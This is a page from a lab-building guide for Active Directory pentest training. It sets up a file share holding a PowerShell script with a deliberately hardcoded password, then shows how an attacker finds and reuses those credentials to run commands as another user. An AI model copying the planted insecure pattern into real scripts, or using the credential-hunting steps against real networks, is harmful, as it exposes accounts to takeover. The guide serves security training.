# Password on shares
## Configuring
### Prerequisite
{% content-ref url="page-3" %}
[page-3](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/misc/page-3)
{% endcontent-ref %}
### Configuring
1. Login on `DC02` with the username `Administrator` and password `Welcome01!`.
2. Open the "Active Directory Users and Computers" administration tool on `DC02`.
3\. Right click on the "Users" directory and select "New" and then "User". Create a user with the name `testreset`.
4\. Fill in the password `Testing123Testing!` and select "Password never expires" and make sure "User must change password at next logon" is not selected.
5\. Login on `FILE01` with the username `Administrator` and password `Welcome01!`.
6\. Open "Windows Explorer" and browse to `C:\Share\IT`.
7\. Create a directory "Scripts" and enter the Directory. Then create a new textdocument with the name `Password-reset-transferuser-testscript.ps1` and place the following content inside it:
```
$password = 'Testing123Testing!'
$credentials = New-Object System.Management.Automation.PsCredential("amsterdam\testreset",$password)
Import-module ActiveDirectory
#Generate a 15-character random password.
$Password = -join ((33..126) | Get-Random -Count 15 | ForEach-Object { [char]$ })
$NewPwd = ConvertTo-SecureString $Password -AsPlainText -Force
$user = "sa_transfer_test"
Set-ADAccountPassword $user -NewPassword $NewPwd -Reset -Credential $credentials
#Display userid and new password on the console.
Write-Host $user, $Password
```
8\. Download a couple bogus scripts to the server and place them in the same folder such as:
```
wget https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/Windows%2010/CreateLocalAdminAcc.ps1
wget https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/ActiveDirectory/Add-UsersToGroup.ps1
wget https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/ActiveDirectory/CleanupDisabledUsers.ps1
wget https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/ActiveDirectory/Get-ADUsers.ps1
wget https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/ActiveDirectory/Get-ADComputers.ps1
```
## Attacking
### How it works
During our pentests I often find shares that are accessible for all users and often there are some credentials to be discovered in either configuration files, scripts or Microsoft documents(`.doc`, `.xls`) made to store passwords. Sometimes there even is a NAS that allows null session and read/write on all shares.
### Tools
*
### Executing the attack
The attack is executed from the perspective of already having discovered the IT Share on `FILE01` and having access to it.
{% content-ref url="page-3" %}
[page-3](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/misc/page-3)
{% endcontent-ref %}
1. For having easy access to look at the share login as `noah` with the password `haoNHasAStrongPassword321!@` on `WS01`.
2. Open File Explorer and browse to `\\file01\Data`.
3\. Open the IT directory and then the Script directory.
4\. While looking through the scripts we see that the script `Password-reset-transferuser-testscript` has login credentials saved in the script:
5\. The password for the user `testreset` probably is `Testing123Testing!`. After reading through the code it seems that its a script to reset the credentials of the user `sa_transfer_test` with the credentials of `testreset`.
We can easily test this by starting a new PowerShell session as this user by opening powershell, then in the taskbar right click on it and shift right clicking on Window PowerShell and then selecting "Runas as different user".
6\. Copy and paste the credentials and click on "OK". A PowerShell window opens, type `whoami` to check if we are running as the `testreset` user:
On the following page the ACL's this account has will be abused by resetting a password from another user:
{% content-ref url="../active-directory-attacks/acl-abuses/forcechangepassword" %}
[forcechangepassword](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/acl-abuses/forcechangepassword)
{% endcontent-ref %}
## Defending
### Recommendations
* Don't save credentials in readable files.
